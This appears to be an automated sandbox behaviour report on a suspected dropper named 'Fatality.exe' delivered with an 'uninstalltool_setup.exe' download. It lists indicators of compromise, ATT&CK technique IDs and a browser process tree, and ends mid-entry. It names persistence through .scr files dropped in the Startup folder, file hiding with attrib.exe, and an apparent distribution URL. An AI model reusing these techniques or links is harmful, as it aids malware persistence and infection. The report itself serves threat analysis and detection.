File opened for modification	C:\Users\Admin\Downloads\uninstalltool_setup.exe:Zone.Identifier	msedge.exe
File created	C:\Users\Admin\AppData\Local\Temp\7zO461ABEEE\Fatality.exe:Zone.Identifier	7zFM.exe
File created	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\lEqJU.scr\:Zone.Identifier:$DATA	Fatality.exe
File created	C:\Users\Admin\AppData\Local\Temp\7zO461FB6AF\Fatality.exe:Zone.Identifier	7zFM.exe
File created	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\7bSYX.scr\:Zone.Identifier:$DATA	Fatality.exe

Runs ping.exe 1 TTPs 3 IoCs

Remote System Discovery

T1018

pid	Process
1508	PING.EXE
6040	PING.EXE
6152	PING.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
3248	Explorer.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
5820	msedge.exe
5820	msedge.exe
2528	msedge.exe
2528	msedge.exe
5180	msedge.exe
5180	msedge.exe
820	identity_helper.exe
820	identity_helper.exe
4692	msedge.exe
4692	msedge.exe
4880	msedge.exe
4880	msedge.exe
4908	msedge.exe
4908	msedge.exe
4908	msedge.exe
4908	msedge.exe
2372	msedge.exe
2372	msedge.exe
5892	PinToTaskbar.exe
5892	PinToTaskbar.exe
1248	powershell.exe
1248	powershell.exe
1248	powershell.exe
1204	Fatality.exe
1204	Fatality.exe
4160	powershell.exe
4160	powershell.exe
4160	powershell.exe
5256	powershell.exe
5256	powershell.exe
5256	powershell.exe
1908	powershell.exe
1908	powershell.exe
1908	powershell.exe
3788	powershell.exe
3788	powershell.exe
3788	powershell.exe
3132	powershell.exe
3132	powershell.exe
3132	powershell.exe
4684	chrome.exe
4684	chrome.exe
5920	Fatality.exe
5920	Fatality.exe
2092	powershell.exe
2092	powershell.exe
2092	powershell.exe
2148	powershell.exe
2148	powershell.exe
2148	powershell.exe
4900	powershell.exe
4900	powershell.exe
4900	powershell.exe
880	powershell.exe
880	powershell.exe
880	powershell.exe
5992	powershell.exe
5992	powershell.exe
5992	powershell.exe
4452	7zFM.exe
4452	7zFM.exe
4452	7zFM.exe
4452	7zFM.exe
4612	Fatality.exe

Suspicious behavior: GetForegroundWindowSpam 4 IoCs

pid	Process
5128	OpenWith.exe
4452	7zFM.exe
5888	UninstallTool.exe
3248	Explorer.EXE

Suspicious behavior: LoadsDriver 2 IoCs

pid	Process
672	Process not Found
672	Process not Found

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 63 IoCs

pid	Process
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
4684	chrome.exe
4684	chrome.exe
4684	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeRestorePrivilege	4452	7zFM.exe
Token: 35	4452	7zFM.exe
Token: SeDebugPrivilege	5892	PinToTaskbar.exe
Token: SeShutdownPrivilege	3248	Explorer.EXE
Token: SeCreatePagefilePrivilege	3248	Explorer.EXE
Token: SeShutdownPrivilege	3248	Explorer.EXE
Token: SeCreatePagefilePrivilege	3248	Explorer.EXE
Token: SeShutdownPrivilege	3248	Explorer.EXE
Token: SeCreatePagefilePrivilege	3248	Explorer.EXE
Token: SeShutdownPrivilege	3248	Explorer.EXE
Token: SeCreatePagefilePrivilege	3248	Explorer.EXE
Token: SeDebugPrivilege	1248	powershell.exe
Token: SeShutdownPrivilege	3248	Explorer.EXE
Token: SeCreatePagefilePrivilege	3248	Explorer.EXE
Token: SeShutdownPrivilege	3248	Explorer.EXE
Token: SeCreatePagefilePrivilege	3248	Explorer.EXE
Token: SeShutdownPrivilege	3248	Explorer.EXE
Token: SeCreatePagefilePrivilege	3248	Explorer.EXE
Token: SeShutdownPrivilege	3248	Explorer.EXE
Token: SeCreatePagefilePrivilege	3248	Explorer.EXE
Token: SeShutdownPrivilege	3248	Explorer.EXE
Token: SeCreatePagefilePrivilege	3248	Explorer.EXE
Token: SeShutdownPrivilege	3248	Explorer.EXE
Token: SeCreatePagefilePrivilege	3248	Explorer.EXE
Token: SeShutdownPrivilege	3248	Explorer.EXE
Token: SeCreatePagefilePrivilege	3248	Explorer.EXE
Token: SeShutdownPrivilege	3248	Explorer.EXE
Token: SeCreatePagefilePrivilege	3248	Explorer.EXE
Token: SeShutdownPrivilege	3248	Explorer.EXE
Token: SeCreatePagefilePrivilege	3248	Explorer.EXE
Token: SeShutdownPrivilege	3248	Explorer.EXE
Token: SeCreatePagefilePrivilege	3248	Explorer.EXE
Token: SeShutdownPrivilege	3248	Explorer.EXE
Token: SeCreatePagefilePrivilege	3248	Explorer.EXE
Token: SeShutdownPrivilege	3248	Explorer.EXE
Token: SeCreatePagefilePrivilege	3248	Explorer.EXE
Token: SeShutdownPrivilege	3248	Explorer.EXE
Token: SeCreatePagefilePrivilege	3248	Explorer.EXE
Token: SeShutdownPrivilege	3248	Explorer.EXE
Token: SeCreatePagefilePrivilege	3248	Explorer.EXE
Token: SeShutdownPrivilege	3248	Explorer.EXE
Token: SeCreatePagefilePrivilege	3248	Explorer.EXE
Token: SeShutdownPrivilege	3248	Explorer.EXE
Token: SeCreatePagefilePrivilege	3248	Explorer.EXE
Token: SeShutdownPrivilege	3248	Explorer.EXE
Token: SeCreatePagefilePrivilege	3248	Explorer.EXE
Token: SeShutdownPrivilege	3248	Explorer.EXE
Token: SeCreatePagefilePrivilege	3248	Explorer.EXE
Token: SeShutdownPrivilege	3248	Explorer.EXE
Token: SeCreatePagefilePrivilege	3248	Explorer.EXE
Token: SeShutdownPrivilege	3248	Explorer.EXE
Token: SeCreatePagefilePrivilege	3248	Explorer.EXE
Token: SeShutdownPrivilege	3248	Explorer.EXE
Token: SeCreatePagefilePrivilege	3248	Explorer.EXE
Token: SeShutdownPrivilege	3248	Explorer.EXE
Token: SeCreatePagefilePrivilege	3248	Explorer.EXE
Token: SeShutdownPrivilege	3248	Explorer.EXE
Token: SeCreatePagefilePrivilege	3248	Explorer.EXE
Token: SeShutdownPrivilege	3248	Explorer.EXE
Token: SeCreatePagefilePrivilege	3248	Explorer.EXE
Token: SeShutdownPrivilege	3248	Explorer.EXE
Token: SeCreatePagefilePrivilege	3248	Explorer.EXE
Token: SeShutdownPrivilege	3248	Explorer.EXE
Token: SeCreatePagefilePrivilege	3248	Explorer.EXE

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
4452	7zFM.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
3752	uninstalltool_setup.tmp
3248	Explorer.EXE
4452	7zFM.exe
4452	7zFM.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
2528	msedge.exe
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE

Suspicious use of SetWindowsHookEx 64 IoCs

pid	Process
5128	OpenWith.exe
5128	OpenWith.exe
5128	OpenWith.exe
5128	OpenWith.exe
5128	OpenWith.exe
5128	OpenWith.exe
5128	OpenWith.exe
5128	OpenWith.exe
5128	OpenWith.exe
5128	OpenWith.exe
5128	OpenWith.exe
5128	OpenWith.exe
5128	OpenWith.exe
5128	OpenWith.exe
5128	OpenWith.exe
5128	OpenWith.exe
5128	OpenWith.exe
5128	OpenWith.exe
5128	OpenWith.exe
5128	OpenWith.exe
5128	OpenWith.exe
5128	OpenWith.exe
5128	OpenWith.exe
5128	OpenWith.exe
5128	OpenWith.exe
5128	OpenWith.exe
5128	OpenWith.exe
5128	OpenWith.exe
2748	MiniSearchHost.exe
5196	UninstallTool.exe
2020	UninstallTool.exe
2904	UninstallTool.exe
5224	UninstallTool.exe
2356	UninstallTool.exe
5888	UninstallTool.exe
5888	UninstallTool.exe
5888	UninstallTool.exe
5888	UninstallTool.exe
5888	UninstallTool.exe
5888	UninstallTool.exe
5888	UninstallTool.exe
5888	UninstallTool.exe
5888	UninstallTool.exe
5888	UninstallTool.exe
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
5888	UninstallTool.exe
5888	UninstallTool.exe
5888	UninstallTool.exe
3248	Explorer.EXE
5888	UninstallTool.exe
5888	UninstallTool.exe
5888	UninstallTool.exe
5888	UninstallTool.exe
5888	UninstallTool.exe
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE
3248	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2528 wrote to memory of 6100	2528	msedge.exe	81
PID 2528 wrote to memory of 6100	2528	msedge.exe	81
PID 2528 wrote to memory of 5320	2528	msedge.exe	82
PID 2528 wrote to memory of 5320	2528	msedge.exe	82
PID 2528 wrote to memory of 5320	2528	msedge.exe	82
PID 2528 wrote to memory of 5320	2528	msedge.exe	82
PID 2528 wrote to memory of 5320	2528	msedge.exe	82
PID 2528 wrote to memory of 5320	2528	msedge.exe	82
PID 2528 wrote to memory of 5320	2528	msedge.exe	82
PID 2528 wrote to memory of 5320	2528	msedge.exe	82
PID 2528 wrote to memory of 5320	2528	msedge.exe	82
PID 2528 wrote to memory of 5320	2528	msedge.exe	82
PID 2528 wrote to memory of 5320	2528	msedge.exe	82
PID 2528 wrote to memory of 5320	2528	msedge.exe	82
PID 2528 wrote to memory of 5320	2528	msedge.exe	82
PID 2528 wrote to memory of 5320	2528	msedge.exe	82
PID 2528 wrote to memory of 5320	2528	msedge.exe	82
PID 2528 wrote to memory of 5320	2528	msedge.exe	82
PID 2528 wrote to memory of 5320	2528	msedge.exe	82
PID 2528 wrote to memory of 5320	2528	msedge.exe	82
PID 2528 wrote to memory of 5320	2528	msedge.exe	82
PID 2528 wrote to memory of 5320	2528	msedge.exe	82
PID 2528 wrote to memory of 5320	2528	msedge.exe	82
PID 2528 wrote to memory of 5320	2528	msedge.exe	82
PID 2528 wrote to memory of 5320	2528	msedge.exe	82
PID 2528 wrote to memory of 5320	2528	msedge.exe	82
PID 2528 wrote to memory of 5320	2528	msedge.exe	82
PID 2528 wrote to memory of 5320	2528	msedge.exe	82
PID 2528 wrote to memory of 5320	2528	msedge.exe	82
PID 2528 wrote to memory of 5320	2528	msedge.exe	82
PID 2528 wrote to memory of 5320	2528	msedge.exe	82
PID 2528 wrote to memory of 5320	2528	msedge.exe	82
PID 2528 wrote to memory of 5320	2528	msedge.exe	82
PID 2528 wrote to memory of 5320	2528	msedge.exe	82
PID 2528 wrote to memory of 5320	2528	msedge.exe	82
PID 2528 wrote to memory of 5320	2528	msedge.exe	82
PID 2528 wrote to memory of 5320	2528	msedge.exe	82
PID 2528 wrote to memory of 5320	2528	msedge.exe	82
PID 2528 wrote to memory of 5320	2528	msedge.exe	82
PID 2528 wrote to memory of 5320	2528	msedge.exe	82
PID 2528 wrote to memory of 5320	2528	msedge.exe	82
PID 2528 wrote to memory of 5320	2528	msedge.exe	82
PID 2528 wrote to memory of 5820	2528	msedge.exe	83
PID 2528 wrote to memory of 5820	2528	msedge.exe	83
PID 2528 wrote to memory of 668	2528	msedge.exe	84
PID 2528 wrote to memory of 668	2528	msedge.exe	84
PID 2528 wrote to memory of 668	2528	msedge.exe	84
PID 2528 wrote to memory of 668	2528	msedge.exe	84
PID 2528 wrote to memory of 668	2528	msedge.exe	84
PID 2528 wrote to memory of 668	2528	msedge.exe	84
PID 2528 wrote to memory of 668	2528	msedge.exe	84
PID 2528 wrote to memory of 668	2528	msedge.exe	84
PID 2528 wrote to memory of 668	2528	msedge.exe	84
PID 2528 wrote to memory of 668	2528	msedge.exe	84
PID 2528 wrote to memory of 668	2528	msedge.exe	84
PID 2528 wrote to memory of 668	2528	msedge.exe	84
PID 2528 wrote to memory of 668	2528	msedge.exe	84
PID 2528 wrote to memory of 668	2528	msedge.exe	84
PID 2528 wrote to memory of 668	2528	msedge.exe	84
PID 2528 wrote to memory of 668	2528	msedge.exe	84
PID 2528 wrote to memory of 668	2528	msedge.exe	84
PID 2528 wrote to memory of 668	2528	msedge.exe	84
PID 2528 wrote to memory of 668	2528	msedge.exe	84
PID 2528 wrote to memory of 668	2528	msedge.exe	84

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2512	attrib.exe
2164	attrib.exe
1412	attrib.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Loads dropped DLL
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:3248
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://oxy.name/d/zBZh
  2⤵
  - Enumerates system info in registry
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:2528
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffda48f3cb8,0x7ffda48f3cc8,0x7ffda48f3cd8
    3⤵
    PID:6100
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1920,17705039546647805593,2263184709322121362,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1892 /prefetch:2
    3⤵
    PID:5320
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1920,17705039546647805593,2263184709322121362,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2392 /prefetch:3
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:5820
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1920,17705039546647805593,2263184709322121362,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2672 /prefetch:8
    3⤵
    PID:668
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,17705039546647805593,2263184709322121362,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3272 /prefetch:1
    3⤵
    PID:2868
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,17705039546647805593,2263184709322121362,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1
    3⤵
    PID:908
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,17705039546647805593,2263184709322121362,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4904 /prefetch:1
    3⤵
    PID:5356
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,17705039546647805593,2263184709322121362,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3432 /prefetch:1
    3⤵
    PID:3280
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,17705039546647805593,2263184709322121362,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5336 /prefetch:1
    3⤵
    PID:5660
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,17705039546647805593,2263184709322121362,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2352 /prefetch:1
    3⤵
    PID:4228
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,17705039546647805593,2263184709322121362,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5672 /prefetch:1
    3⤵
    PID:2704
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,17705039546647805593,2263184709322121362,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5792 /prefetch:1
    3⤵
    PID:924
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,17705039546647805593,2263184709322121362,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5832 /prefetch:1
    3⤵
    PID:5692
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1920,17705039546647805593,2263184709322121362,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5484 /prefetch:8
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:5180
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,17705039546647805593,2263184709322121362,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5676 /prefetch:1
    3⤵
    PID:6028
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,17705039546647805593,2263184709322121362,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6096 /prefetch:1
    3⤵
    PID:3096
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,17705039546647805593,2263184709322121362,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6228 /prefetch:1
    3⤵
    PID:876
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,17705039546647805593,2263184709322121362,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6260 /prefetch:1
    3⤵
    PID:4696
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,17705039546647805593,2263184709322121362,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6564 /prefetch:1
    3⤵
    PID:3524
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,17705039546647805593,2263184709322121362,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6672 /prefetch:1
    3⤵
    PID:2216
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,17705039546647805593,2263184709322121362,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6888 /prefetch:1
    3⤵
    PID:3100
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,17705039546647805593,2263184709322121362,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7008 /prefetch:1
    3⤵
    PID:4148
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,17705039546647805593,2263184709322121362,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7020 /prefetch:1
    3⤵
    PID:3764
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,17705039546647805593,2263184709322121362,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7156 /prefetch:1
    3⤵
    PID:3292
- - C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1920,17705039546647805593,2263184709322121362,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5544 /prefetch:8
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:820
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,17705039546647805593,2263184709322121362,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7136 /prefetch:1
    3⤵
    PID:3796
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,17705039546647805593,2263184709322121362,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7644 /prefetch:1
    3⤵
    PID:4588
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
